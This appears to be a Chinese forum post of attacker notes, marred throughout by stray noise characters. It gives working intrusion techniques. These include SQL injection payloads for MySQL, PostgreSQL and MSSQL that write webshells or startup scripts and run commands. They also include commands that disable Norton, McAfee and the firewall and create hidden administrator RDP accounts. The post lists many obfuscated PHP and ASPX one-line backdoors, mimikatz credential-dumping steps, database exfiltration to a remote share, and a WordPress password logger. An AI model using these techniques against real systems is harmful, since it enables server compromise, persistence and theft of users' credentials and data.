; H0 Y3 G4 | {+ U0 Ncreate table a (cmd text);5 @" \) R+ K3 w3 E6 N8 M2 {
insert into a values ("set wshshell=createobject (""wscript.shell"") " );4 C. Q" D: J% s5 x
insert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );. h, U8 |% j8 [% J3 ]
insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );/ M. R5 U2 g0 @
select * from a into outfile "C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\a.vbs";
. r) D1 U" e" |4 t/ xdrop table a;3 U0 d/ s! {/ h B6 e, d4 N7 C7 n
/ Q0 O o( v& C" h英文版本:
0 x7 z! R7 V7 S' A9 m7 l5 ~! Y, j% g" ?$ n
use test;
- O( R2 n2 E3 Y7 V1 }2 `create table a (cmd text);' ]9 u) D* ^, q+ z
insert into a values ("set wshshell=createobject (""wscript.shell"") " );3 N% x% ~6 C, ?& p8 v+ Z; @# D! c5 m
insert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );
( ~% C0 R* Q7 ^' {7 \/ P1 r2 Iinsert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );" h$ E- w0 w% ^# s" B+ ?- I/ |( m K
select * from a into outfile "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\a.vbs";
6 w) H# S( Q) `9 O0 t2 ]' v8 Ldrop table a;3 [( H$ t5 U5 S# k
% B3 n6 Q1 _2 h7 s; U. l1 ycreate table a (cmd BLOB);' P3 [2 e+ e3 Y5 ~8 U
insert into a values (CONVERT(木马的16进制代码,CHAR));
z# `" Q& h+ {5 k: A5 W, e! eselect * from a into dumpfile 'C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\启动\\mm.exe'% s1 f* _& X- S7 V6 B
drop table a;/ L" }+ `0 K; s- R' e& i
% b' I$ \4 ?; K7 m" T- c9 L ~' N记录一下怎么处理变态诺顿
9 M9 b( r- @+ n* `, W+ S4 P3 t3 r查看诺顿服务的路径0 y6 W, ~: W. z. ]
sc qc ccSetMgr( s: Z6 ]$ I& K M
然后设置权限拒绝访问。做绝一点。。
1 h! f1 h* F5 y9 Vcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d system
, f/ N$ ]2 t. Scacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d "CREATOR OWNER"7 {4 ]9 e6 N$ f, p) r" _
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d administrators- x) A; t& H3 S' Z
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d everyone+ n3 ]. p2 O3 D+ Y
6 w/ E. ~# w* h# q
然后再重启服务器( X. }& @1 ]3 T- j# l
iisreset /reboot* U% V5 ^* M# `& { W" m
这样就搞定了。。不过完事后。记得恢复权限。。。。
]9 D( ? ]; V5 |8 r: Tcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G system:F
* A+ F6 D, H3 x4 x+ r( x; U3 gcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G "CREATOR OWNER":F
' S8 ~9 F1 s' B- k* s( K; W( Vcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G administrators:F: Z! ~, w; D! b7 i2 j
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G everyone:F! r4 O" L. H6 V3 ^$ K
SELECT '<%eval(request(chr(35)))%>' into [fuck] in 'E:\asp.asp;fuck.xls' 'EXCEL 4.0;' from admin
$ v: y; D( u+ q4 D1 y
$ q- {2 K- O; r% D; yEXEC('ma'+'ster..x'+'p_cm'+'dsh'+'ell ''net user''')5 h! }+ W8 J# a' U8 S1 g9 R
; r( R( _+ d, X+ o) `) R& ipostgresql注射的一些东西2 _" }$ a" s# _5 P4 V
如何获得webshell
/ m4 w# [* v7 x( bhttp://127.0.0.1/postgresql.php?id=1;create%20table%20fuck(shit%20text%20not%20null);
8 {/ i8 H6 R5 r( _: `5 u1 whttp://127.0.0.1/postgresql.php?id=1;insert into fuck values($$<?php eval($_POST[cmd]);?>$$); 8 m1 I, J! x. M1 @0 [
http://127.0.0.1/postgresql.php?id=1;copy%20fuck(shit)%20to%20$$/tmp/test.php$$;
5 x6 _1 B' r3 q8 p& U* P2 h如何读文件" t: a, K( n$ q- f- E
http://127.0.0.1/postgresql.php?id=1;create table myfile (input TEXT);
8 X5 X) e& [3 ~: d0 \http://127.0.0.1/postgresql.php?id=1;copy myfile from ‘/etc/passwd’;0 T% T' p! A" A4 C9 L& @) o
http://127.0.0.1/postgresql.php?id=1;select * from myfile;9 K/ R: X) a2 K' R$ w
% j' b _, M/ D3 F' H
z执行命令有两种方式,一种是需要自定义的lic函数支持,一种是用pl/python支持的。
' B2 n1 [% a3 @$ L# w3 C当然,这些的postgresql的数据库版本必须大于8.X# Y. N8 Q6 k$ H
创建一个system的函数:
6 t( n. C1 Q; @0 h; R; vCREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6', 'system' LANGUAGE 'C' STRICT- g# F' l s! a+ n
5 |: N! D0 j. d8 R4 p3 w创建一个输出表:; `- x7 R1 y' p3 }' X1 l* ^
CREATE TABLE stdout(id serial, system_out text)1 ]& g/ G0 C g& {3 G. V8 X: q
# s. r5 S+ A7 e$ K% W
执行shell,输出到输出表内:' S4 E! s; R7 \0 K1 J7 ?
SELECT system('uname -a > /tmp/test')
- u. W) q0 l1 c& j8 _: L/ ^% i! G7 S- X* u, g* {& e
copy 输出的内容到表里面;
' m0 N2 r- p' r, a9 b1 U9 x2 M$ Y: vCOPY stdout(system_out) FROM '/tmp/test'
0 w7 P3 ^$ A4 l- _" L* ^3 f( ^, m) Q
* r: V6 ~- c0 Z从输出表内读取执行后的回显,判断是否执行成功
7 m/ u$ ], j; v9 M3 w* |% S+ j' U- d3 [5 I. @% `2 f7 g8 l5 u
SELECT system_out FROM stdout- h# v8 Q9 G: B7 i2 K$ X9 u
下面是测试例子
$ S8 L- q9 |0 V9 `" ~: y
7 b9 X* N4 {# U7 E) g/ p/store.php?id=1; CREATE TABLE stdout(id serial, system_out text) --
. t- y$ Q( S' C
% x2 f* J; z% G, h( O/store.php?id=1; CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6','system' LANGUAGE 'C'0 }. G Z" s4 Q6 q1 y8 E6 h
STRICT --# `1 l9 _) J) X4 {0 |/ C2 v
& B! c5 o9 U* D3 S8 w
/store.php?id=1; SELECT system('uname -a > /tmp/test') --% L$ H- t: r! V6 D6 H
Z7 B' e+ B7 c/store.php?id=1; COPY stdout(system_out) FROM '/tmp/test' --
7 v" a8 o0 }# t6 x( J" K0 |$ U; r! A9 X& i8 y. @
/store.php?id=1 UNION ALL SELECT NULL,(SELECT stdout FROM system_out ORDER BY id DESC),NULL LIMIT 1 OFFSET 1--8 K* ~2 ?8 E* G6 ` t. [+ |; c
net stop sharedaccess stop the default firewall
( C5 s, l, _2 Q! a4 I+ J0 D# ynetsh firewall show show/config default firewall
6 z j4 k/ G5 P7 r! t" tnetsh firewall set notifications disable disable the notify when the program is disabled by the default firewall( { d- H8 U! p5 o1 p! A
netsh firewall add allowedprogram c:\1.exe Svchost add the program which is allowed by default firewall
a' e% d9 v# K; c0 ~修改3389端口方法(修改后不易被扫出)
: ~. ?0 u& q. P3 r- p& S修改服务器端的端口设置,注册表有2个地方需要修改& U6 d/ P, P D' [) x: j
( L$ W5 T# l% |5 C4 d# b
[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\TerminalServer\\Wds\\rdpwd\\Tds\\tcp]
% }, y* O. E1 j# ?$ OPortNumber值,默认是3389,修改成所希望的端口,比如60002 N4 L& ]# V% A7 t) ~$ P
( c, r6 P/ C' Z# A% `第二个地方:2 [) d) y, \# e" u4 F8 D; {! U7 \: q# B
[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp]
" ?0 {$ b' X/ |PortNumber值,默认是3389,修改成所希望的端口,比如6000
- h! @( I- I3 K [8 i! A0 |! o
0 ~5 k6 s+ K: S+ s现在这样就可以了。重启系统就可以了
1 t. c c+ f. A* J5 X" h' P8 M) M# d7 X0 {2 v7 ^2 R9 Y
查看3389远程登录的脚本
: \2 Z/ ?. O2 T保存为一个bat文件
% a; y f; h& T( q" k% bdate /t >>D:\sec\TSlog\ts.log2 c# a4 e* e/ w, Q% z/ _$ ~& m& E4 h
time /t >>D:\sec\TSlog\ts.log- K- y+ A3 C' o0 h* q
netstat -n -p tcp | find ":3389">>D:\sec\TSlog\ts.log
! h1 E8 X$ [8 n4 C2 w1 Zstart Explorer
& T- t8 P8 i$ ?
3 L! C. _- v. [0 |% J0 {( \mstsc的参数:
6 ]. L. ]% ~' p( J' t, b4 O& T
6 }+ u/ p+ k% U; a远程桌面连接9 a% G% y4 g8 Z$ |( j- e* t: {
j% l6 Z h9 D. v, P8 \" _MSTSC [<Connection File>] [/v:<server[:port]>] [/console] [/f[ullscreen]]
* ]; B: O" W1 t7 H* l1 h [/w:<width> /h:<height>] | /Edit"ConnectionFile" | /Migrate | /?( U' {8 C( Q- X6 j! @
, A7 N. H p( d, l. |
<Connection File> -- 指定连接的 .rdp 文件的名称。 X: G: h. {7 g" C; @
! y' ~1 H6 @2 t5 v6 B
/v:<server[:port]> -- 指定要连接到的终端服务器。0 D( B2 n& M' `* i
5 H' I: p% L; ]$ H
/console -- 连接到服务器的控制台会话。
3 [& p y, @& z9 L0 D% x* L
! @; y% `0 @/ C7 q/f -- 以全屏模式启动客户端。
! c+ D4 B/ k2 D4 d( k0 N& z/ K% B& w' O; _$ [0 L' O( p- j
/w:<width> -- 指定远程桌面屏幕的宽度。5 `0 E, ?& f# \: p( Z
r- I% B6 N5 h6 N
/h:<height> -- 指定远程桌面屏幕的高度。1 G p5 o8 r+ \/ ~) C6 s, \' h
' B2 K [! P) H$ _6 X- k- k& ]8 q. _/edit -- 打开指定的 .rdp 文件来编辑。( S8 V6 l( x$ l2 N
' |. N" N# p; Z S) z/migrate -- 将客户端连接管理器创建的旧版1 }( b' a' @. X9 j' n0 @
连接文件迁移到新的 .rdp 连接文件。( S4 `# c% C$ U# k7 I
4 j- D- c6 A/ v- t; m# E
7 m. c' R: m/ S2 c& a+ i, F其中mstsc /console连接的是session 0,而mstsc是另外打开一个虚拟的session,这样的话就是相当与另外登陆计算机。也就是说带console参数连接的是显示器显示的桌面。大家可以试试啊,有的时候用得着的,特别是一些软件就2 z2 _% k2 ]- X1 f C
mstsc /console /v:124.42.126.xxx 突破终端访问限制数量
( S5 y3 B/ t, W) |6 o
9 ]) a# z* t2 t) }* a命令行下开启3389$ S* g! [# u+ B$ b+ m
net user asp.net aspnet /add
2 ^; C' f$ }1 k8 @$ ~* ]: Snet localgroup Administrators asp.net /add
- u/ G$ h4 o- A- O) Wnet localgroup "Remote Desktop Users" asp.net /add
# O# X k: ^6 w+ ^2 H) R0 fattrib +h "%SYSTEMDRIVE%\Documents and Settings\asp.net" /S /D
2 r/ V9 T# |, O% i0 _+ C3 G' ?echo Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t reg_dword /d 0
( x: o9 R# Y. Y& a- Gecho Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v AllowTSConnections /t reg_dword /d 1
$ h* s' ]3 U( Q2 B: ?% ?echo Y | reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "asp.net" /t REG_DWORD /d 00000000 /f
6 @0 f) k- j4 T. R" s0 Fsc config rasman start= auto. X; ~( [+ Y% O: X, F
sc config remoteaccess start= auto
6 P2 f7 }5 X6 }' m6 e3 S2 ?net start rasman# q! J8 i( d1 u/ E7 X
net start remoteaccess
9 ?! a5 [( V4 v3 i/ {Media
0 @' k A9 e8 P8 y+ s! [% V<form id="frmUpload" enctype="multipart/form-data" n# ]% c, Z; a" s D8 j# W) `
action="http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br>) U- k9 _& z# _ m+ y
<input type="file" name="NewFile" size="50"><br>
p- C8 ]# z' p) c<input id="btnUpload" type="submit" value="Upload">
1 Z/ Q8 }/ _3 J% T</form>
4 T% `- A( L: l/ Y7 D
, V7 {2 S# k6 n7 ~- P8 econtrol userpasswords2 查看用户的密码; x1 D* ]( R3 Y" e- Y2 C# U, o
access数据库直接导出为shell,前提a表在access中存在。知道网站的真实路径1 \% |$ @5 M8 |7 E8 x8 N
SELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a
t- X3 ?: q3 e5 E) ?3 v
1 l0 G H- R: l. I- ]141、平时手工MSSQL注入的时候如果不能反弹写入,那么大多数都是把记录一条一条读出来,这样太累了,这里给出1条语句能读出所有数据:' ?& N1 ]: t& a2 S9 F
测试1:
% l( l) W$ y: O; ?( i7 X, XSELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1
+ {% ^4 V- I3 D9 F& z
' V2 ]+ \8 e9 L; {+ i测试2:
: P+ c$ J) {5 B1 y, J/ e/ j
, V- m& a1 {2 u3 P Y0 X, i4 lcreate table dirs(paths varchar(100),paths1 varchar(100), id int)
. f4 p3 U" w& I1 C/ Z3 u3 m( t- O7 A
, u$ m+ H Q" Q& b* R: a7 ~delete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--
/ U: ]+ h- s5 ?8 R) C! M, K1 ?& [& a3 a! }+ y
SELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1& U- b# S5 w3 g2 |+ c# D o
关闭macfee软件的方法://需要system权限,请使用at或psexec –s cmd.exe命令
% d8 z7 R z! G4 k可以上传.com类型的文件,如nc.com来绕过macfee可执行限制;8 ^# ^7 A4 b* y5 A8 R8 A/ J$ g
net stop mcafeeframework1 X; N6 p# _5 p b) a" \5 N) A5 a
net stop mcshield
2 c5 s+ R5 S! ]) r1 b: Vnet stop mcafeeengineservice
1 }% K0 n0 f8 m1 [" H" A: F7 Mnet stop mctaskmanager: Z: F0 n0 X/ e: L, }) z2 c
http://www.antian365.com/forum.p ... DU5Nzl8NDY5Mw%3D%3D/ j0 R2 i! p: p& E! N; s0 a
) T: D8 Z" p- O: B
VNCDump.zip (4.76 KB, 下载次数: 1)
: j& m5 w9 D! v! I' \7 m密码在线破解http://tools88.com/safe/vnc.php
$ {# I/ O$ x' v% U- o; oVNC密码可以通过vncdump 直接获取,通过dos查询[HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4] 下的Password也可以获取
2 ]! E: S6 L. h% F* `; d, F* p" P7 J$ p1 [ ~# e) [' W1 n7 O
exec master..xp_cmdshell 'net user'+ |& F' C; `1 ?2 s, o* F6 N8 g* Z
mssql执行命令。7 s, ]+ w. M) r
获取mssql的密码hash查询
# V$ S5 P% ^* w" Zselect name,password from master.dbo.sysxlogins
8 ?' R' D% [2 ~- N3 z$ m0 Y' e& {3 o5 X1 z6 a6 J9 X' u
backup log dbName with NO_LOG;
' s" ]: K' t& q! rbackup log dbName with TRUNCATE_ONLY;
; }. a- g1 I) X/ EDBCC SHRINKDATABASE(dbName);
0 s2 A0 _- M- q9 ]3 nmssql数据库压缩' ]" b5 ?: ?& u. ?
2 y; n' t+ B3 d2 J5 @% r6 n4 F/ O/ Y
Rar.exe a -ep1 -m0 -v200m E:\web\1.rar E:\webbackup\game_db_201107170400.BAK. ^0 M1 Q4 B8 B( l
将game_db_201107170400.BAK文件压缩为1.rar,大小为200M的分卷文件。3 M3 }1 I+ s y% s/ I" S( S
5 e9 d- [, ?9 `# k, a: m- N% cbackup database game to disk='D:\WebSites\game.com\UpFileList\game.bak'
+ B' r! ^0 }/ Z1 G; B备份game数据库为game.bak,路径为D:\WebSites\game.com\UpFileList\game.bak
/ R5 X4 P4 ^' S8 V
" T! O: n: n6 z: O8 LDiscuz!nt35渗透要点:1 i' H5 D, z4 W4 v8 Y, l5 X( g+ n
(1)访问 网站地址/admin/global/global_templatesedit.aspx?path=../tools/&filename=rss.aspx&templateid=1&templatename=Default. v- _, f q7 w! r
(2)打开rss.aspx文件,将<%@ Page Inherits="Discuz.Web.UI.RssPage" %>复制到本地备份,然后替换其为<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>$ L% N9 e1 `6 f4 G, I7 {. }
(3)保存。
- C; X3 D$ I# Z3 B(4)一句话后门地址http://somesite.com.cn/tools/rss.aspx 密码为pass
* W1 q, f' c4 | Ad:\rar.exe a -r d:\1.rar d:\website\: I9 }# u% G; F7 W
递归压缩website, ~+ l3 V( ~2 ]6 X; Y
注意rar.exe的路径* k1 a: u2 C: O4 }3 k5 T4 G9 n
- ?; n6 t" G7 U" o2 F
<?php( W8 {! c9 o( b
7 a W/ C& O& B3 g8 D( V* N% d$telok = "0${@eval($_POST[xxoo])}";
( `. i3 b2 f$ S9 a& {( {' z' [
a$ q" f" c5 w, P$username = "123456";3 C7 @ Y, A! x7 ~* T
6 @9 K( q4 R" y y
$userpwd = "123456";; N2 S* g1 B; k" }5 C2 d
. w: B* i& D6 J7 Y
$telhao = "123456";. v# h7 q9 F3 D8 g) A4 z7 b
3 X! {% \0 |! ~" q2 A2 `2 W: @2 K/ ?* _$telinfo = "123456";
* z' V/ n& z& q* m5 ]0 I) r# [$ m+ J ?7 l* H
?>
1 l* E& g) }; Y' A* Aphp一句话未过滤插入一句话木马
/ ]& N; Q$ q1 `* U% W5 |9 r" | ^0 K2 v) N1 Z& @3 ^" R
站库分离脱裤技巧
! b. @ E$ @* F5 ^) {" Zexec master..xp_cmdshell 'net use \\xx.xx.xx.xx\d$\test "pass" /user:"user"'- ]% N( ~, k" K( d' M
exec master..xp_cmdshell 'bcp test.dbo.test out \\xx.xx.xx.xx\d$\test\1.txt -c -Slocalhost -Uuser -Ppass'
, W7 ?" X* h l& _$ c0 I2 a条件限制写不了大马,只有一个一句话,其实要实现什么完全够了,只是很不直观方便啊,比如tuo库。2 L7 l8 N# b- W% \
这儿利用的是马儿的专家模式(自己写代码)。
" p: O; O0 ^ b9 Vini_set('display_errors', 1);
4 X" ^. o3 V+ s# sset_time_limit(0);$ X. k8 R' J; }3 V5 m! J
error_reporting(E_ALL);
) s; S' c9 Z+ e& V& _4 l4 ]4 }$connx = mysql_connect(":/var/tmp/mysql.sock", "forum", "xx!!xx3") or die("Could not connect: " . mysql_error());$ c* }( B w# f4 L( l0 e. Z
mysql_select_db("discuz",$connx) or die("Could not connect: " . mysql_error());
8 W: ?* B6 _& q. Q' q$result = mysql_query("Select * FROM members",$connx) or die("Could not connect: " . mysql_error());
" L; J: [% L: F6 h0 B$i = 0;
0 m$ K3 G0 n$ w/ A: F" Q. N$tmp = '';. ~! p# b/ r; [0 o1 Y; Y
while ($row = mysql_fetch_array($result, MYSQL_NUM)) {/ g& i* m A8 c0 \- s% \
$i = $i+1;( A8 N( y0 p! x+ k ~
$tmp .= implode("::", $row)."\n";
+ W x+ `, N) } `5 y2 s' r if(!($i%500)){//500条写入一个文件* ]: o6 k$ U6 |
$filename = '/home/httpd/bbs.xxxxx/forumdata/cache/user'.intval($i/500).'.txt';
2 N' k: w V& u( q8 { file_put_contents($filename,$tmp);4 p2 z K6 Q; s, e% W, @2 ~: t* S
$tmp = '';
& u5 U% b* b" y& f$ @( w# B. y }1 \- T8 v: [; G; ]7 d8 z# T4 [
}' {# C7 r- T& C/ z+ q! m
mysql_free_result($result);( g3 r& J$ r. v2 y, q, `7 x& P
5 t7 S- l' G2 l! d1 n
/ e, G) |0 E# C( `& @
# A- O2 p9 Q0 [ o
//down完后delete
$ ~% z8 A* {" z6 I h/ G$ b
- T; X! q6 d3 `$ c* k7 l8 ~# w4 {0 P" P# ]
ini_set('display_errors', 1);8 ^/ x3 E9 P, Z
error_reporting(E_ALL);
& Y( I( D( T9 Z$ {7 x ^. z; L$i = 0;' H- ]7 b0 o7 E2 L) w
while($i<32) {
6 @; C" k" b4 V; h! \9 _+ t $i = $i+1;
7 Y' G: L# `* F; }% n- c2 E9 c5 z $filename = '/home/httpd/bbs.xxxx/forumdata/cache/user'.$i.'.txt';
: n, m& Q7 n- w4 M! R, W. K unlink($filename);
" [* [6 q5 F; p} . Q+ y5 o+ ^3 o) S9 H8 \
httprint 收集操作系统指纹! [5 G( b9 f5 T
扫描192.168.1.100的所有端口
; h2 p( n; b6 i6 R$ unmap –PN –sT –sV –p0-65535 192.168.1.100
" N8 g1 d) d7 Y9 H" c8 b6 Yhost -t ns www.owasp.org 识别的名称服务器,获取dns信息
' c+ ^" V% V4 V; u% _host -l www.owasp.org ns1.secure.net 可以尝试请求用于owasp.org的区域传输: y* q$ d4 F3 m( W5 p7 l
Netcraft的DNS搜索服务,地址http://searchdns.netcraft.com/?host
/ d0 [7 M/ c& X$ N! d2 d
+ z; |6 \6 Y9 qDomain tools reverse IP: http://www.domaintools.com/reverse-ip/ (需要免费注册)
% n/ W" c d( T6 v8 x" M% B, X: t2 D- }
MSN search: http://search.msn.com 语法: "ip:x.x.x.x" (没有引号)8 g- P7 r, k7 @/ U! ]: h+ K
' t5 Y0 [6 J X1 W Webhosting info: http://whois.webhosting.info/ 语法: http://whois.webhosting.info/x.x.x.x+ Y6 e9 @$ B6 y5 r6 c- u
. D$ r/ h6 N4 t) D DNSstuff: http://www.dnsstuff.com/ (有多种服务可用)* J6 {1 X; z) x5 L
; s! n# [+ j6 n! g8 _) E http://net-square.com/msnpawn/index.shtml (要求安装)
. `6 `7 j. o5 }9 M+ u; j
$ E5 r+ E" y! v' q6 L9 @ tomDNS: http://www.tomdns.net/ (一些服务仍然是非公开的)9 Z8 m/ R2 b; v8 |! I( v. T1 v
; X t: S: x+ m, U9 m- b& N
SEOlogs.com: http://www.seologs.com/ip-domains.html (反向IP/域名查找)
, W) O/ [6 N3 Rset names gb23129 F, K2 q) j' X
导入数据库显示“Data too long for column 'username' at row 1”错误。原因是不支持中文。' C1 P$ ?7 O9 q
8 m! @( M' T. C0 g1 s: o- \mysql 密码修改
+ X5 g7 L7 @( U( k1 v1 e, @UPDATE mysql.user SET password=PASSWORD("newpass") whereuser="mysqladmin ” 0 {- U; U/ `3 g% W, \
update user set password=PASSWORD('antian365.com') where user='root';, L+ A( W4 l3 F7 u. I9 p
flush privileges;+ [) w- R; S" N. e, Y0 r8 {
高级的PHP一句话木马后门
( z& _9 Y' x( Y) P Z: ?% |' H" [1 d- Y& e4 ?
入侵过程发现很多高级的PHP一句话木马。记录下来,以后可以根据关键字查杀/ n* l& Q* _0 g: a# @
+ |. r6 j: m) C# o3 {1、
2 D1 {4 W3 |$ t) m/ \& k7 R9 o) ^$ l2 _) X1 d, |
$hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";/ D! J. ]$ d: P6 y$ z
0 x0 l3 w: p0 F! W G& e( B7 v$hh("/[discuz]/e",$_POST['h'],"Access");, y. P" U, N- `( h& A- p1 F" e
3 l8 o" k$ k4 O//菜刀一句话' Q; ?2 J: z( p( ~! p) I3 e. ?
8 u* J/ k+ Q9 n2、
! l. U5 L' p8 a
$ G( z. A: p5 I$filename=$_GET['xbid'];
/ G) K F( }7 L- E( t6 Y& g9 O
& f v0 R2 O6 k4 Q- u% u$ t( w9 y' \include ($filename);
2 E W- q5 O& v0 S' H8 n9 V- L
, y. I/ \2 M7 b3 o! Q f) p0 |/ S//危险的include函数,直接编译任何文件为php格式运行8 X9 g5 S5 g. w% s# m; ?8 C
; e$ ]8 r6 A' H3、! o0 l9 Z* }8 n2 t3 y" V( o5 w: U
' D7 L" B5 S3 [; G/ H2 m" k+ Y) X+ [$reg="c"."o"."p"."y";
$ a2 J4 `& E2 X: x" F
7 [" X+ E. E8 B% Z" c# g4 e* I$reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);
/ B1 P3 y% K& A% C8 k% _. R$ N: h: A& Z% |( t* m; a
//重命名任何文件7 [( D/ v; J2 Y( m+ B
% ?! S) X3 _# f ]5 g$ C+ x4、* c5 _7 Y* ?$ F
7 [) c6 ?: a# F& q: ~$gzid = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";0 R G' }3 [, [
- n4 n8 x3 b/ h2 j- P1 e! x+ ~4 g8 |
$gzid("/[discuz]/e",$_POST['h'],"Access");
! |5 [$ T% b. N& b: `3 h0 ]6 g- N3 F: _) {4 I
//菜刀一句话
- ^. l# J! ^6 c* ]6 d4 O
9 P( q& S+ O7 g; B8 r" D5、include ($uid);1 t, M! P/ J2 j1 W; e2 b
[& h @9 ~ X' }8 f# `1 ~. y//危险的include函数,直接编译任何文件为php格式运行,POST B' Q: q2 V& U# T, ~
. ]: e( B/ ?# w9 X+ h$ _3 t
/ R0 p( S6 R% D/ T. O4 r//gif插一句话
" x5 l6 R- |8 H" O8 @4 F" s+ x, d' P8 o" J. G3 `8 E
6、典型一句话
6 H! w5 s* T2 V s9 b/ X( [ ~1 {9 s
/ N, E7 h1 l/ c* n程序后门代码8 L. B6 o ^. x. {9 W4 h& E! S" H
<?php eval_r($_POST[sb])?>
5 u( ?/ {& g7 H+ |: \, @程序代码; E% E2 P& @2 Q: h
<?php @eval_r($_POST[sb])?>( L( t4 x. ^; |' }: s( i% h
//容错代码
% R1 a( @' L5 y8 Z0 Y6 ~7 x: f/ f程序代码# w, A# `2 z) Q5 E0 f
<?php assert($_POST[sb]);?>
" T# j% t$ o" T: N5 b9 m//使用lanker一句话客户端的专家模式执行相关的php语句! N7 W# q# M# P1 ^2 t$ e
程序代码1 m( b5 U" t) d/ n; A2 w7 K+ i
<?$_POST['sa']($_POST['sb']);?>
7 _" E% @7 i9 _- q& l- F程序代码% `, V) X) s8 W# P1 w# S0 c. ~; a
<?$_POST['sa']($_POST['sb'],$_POST['sc'])?>3 z; q! l( `* Z2 e& S/ H& S/ f1 a
程序代码
8 h6 e! F2 q: Y<?php
6 v" P% b& {% [5 ]7 t! j, |+ `8 j@preg_replace("/[email]/e",$_POST['h'],"error");& n7 Q k* O1 M/ h$ q' @# S; p
?>
9 k3 I. u8 f* ~5 _//使用这个后,使用菜刀一句话客户端在配置连接的时候在"配置"一栏输入
& o* e- i8 P3 J% T8 A6 t程序代码
$ J( E5 D4 \# E, o! b<O>h=@eval_r($_POST[c]);</O>: f- D6 a! h7 r- H' W- \8 }2 D
程序代码! _6 T! U- h1 G
<script language="php">@eval_r($_POST[sb])</script>& Z0 N# j- T' ]. z/ M) J9 d! r4 P5 M
//绕过<?限制的一句话
1 P' S' ?: G" |( _' F1 a2 c- `8 S! r8 M& M$ M6 [
http://blog.gentilkiwi.com/downloads/mimikatz_trunk.zip
& I2 C1 Q s" n; I9 j( b5 W7 p详细用法:5 i( H$ o1 d0 z
1、到tools目录。psexec \\127.0.0.1 cmd+ w1 I/ O$ }. `. e* _, `
2、执行mimikatz
( G2 u& L/ r* {3、执行 privilege::debug# {: ~& M4 A; U3 T6 b% A
4、执行 inject::process lsass.exe sekurlsa.dll; P' G0 ]4 ^) T
5、执行@getLogonPasswords4 g1 q6 B8 V8 e) {
6、widget就是密码. d8 I1 A1 `" T, h2 z! b
7、exit退出,不要直接关闭否则系统会崩溃。
2 @3 w W5 K5 o K
0 q6 K5 R+ J6 _0 `% R* C; o! u! thttp://www.monyer.com/demo/monyerjs/ js解码网站比较全面
' k& N7 u5 F' b* j$ H1 n u1 P4 i' c1 p* k+ f( q
自动查找系统高危补丁! w( h9 u! r" ?7 ?
systeminfo>a.txt&(for %i in (KB2360937 KB2478960 KB2507938 KB2566454 KB2646524 KB2645640 KB2641653 KB944653 KB952004 KB971657 KB2620712 KB2393802 kb942831 KB2503665 KB2592799) do @type a.txt|@find /i "%i"||@echo %i Not Installed!)&del /f /q /a a.txt
" P8 r/ A, C3 T0 e7 M' i8 m) ]0 w, Q$ l' o3 J
突破安全狗的一句话aspx后门4 A( r& \9 J ], K, T& L. b
<%@ Page Language="C#" ValidateRequest="false" %>
; |! o; M3 v. q$ k% x r$ P<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["你的密码"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%>. h8 T5 J+ u+ y/ k& \
webshell下记录WordPress登陆密码6 T8 L9 K% A2 E3 E0 i
webshell下记录Wordpress登陆密码方便进一步社工: _7 A4 [0 L2 j1 W0 V2 t8 X
在文件wp-login.php中539行处添加:
8 i; I0 H: n+ f( e6 g( t// log password* Q% L& E8 ^8 T4 H& g* O
$log_user=$_POST['log'];8 {5 g7 ~- Q' b; d# {
$log_pwd=$_POST['pwd'];% F) X- j7 x. c; M7 I6 |9 Y
$log_ip=$_SERVER["REMOTE_ADDR"];
, U8 ?) m/ {! ?0 c9 h1 u8 R A$txt=$log_user.’|’.$log_pwd.’|’.$log_ip;) `# b3 | @% w+ {' L% a) ?; v
$txt=$txt.”\r\n”;$ F" V1 K- c8 _2 s% D" M
if($log_user&&$log_pwd&&$log_ip){
1 w) f4 z; e. g% h, T7 k' q@fwrite(fopen(‘pwd.txt’,”a+”),$txt);
6 r1 x3 T9 ~; `}6 p" K- Z9 X9 x, Z- U
当action=login的时候会触发记录密码code,当然了你也可以在switch…case..语句中的default中写该代码。! b% p9 s# B' Y- z8 w" \( f0 v
就是搜索case ‘login’. W) P- d$ r* Q/ v8 z g) F
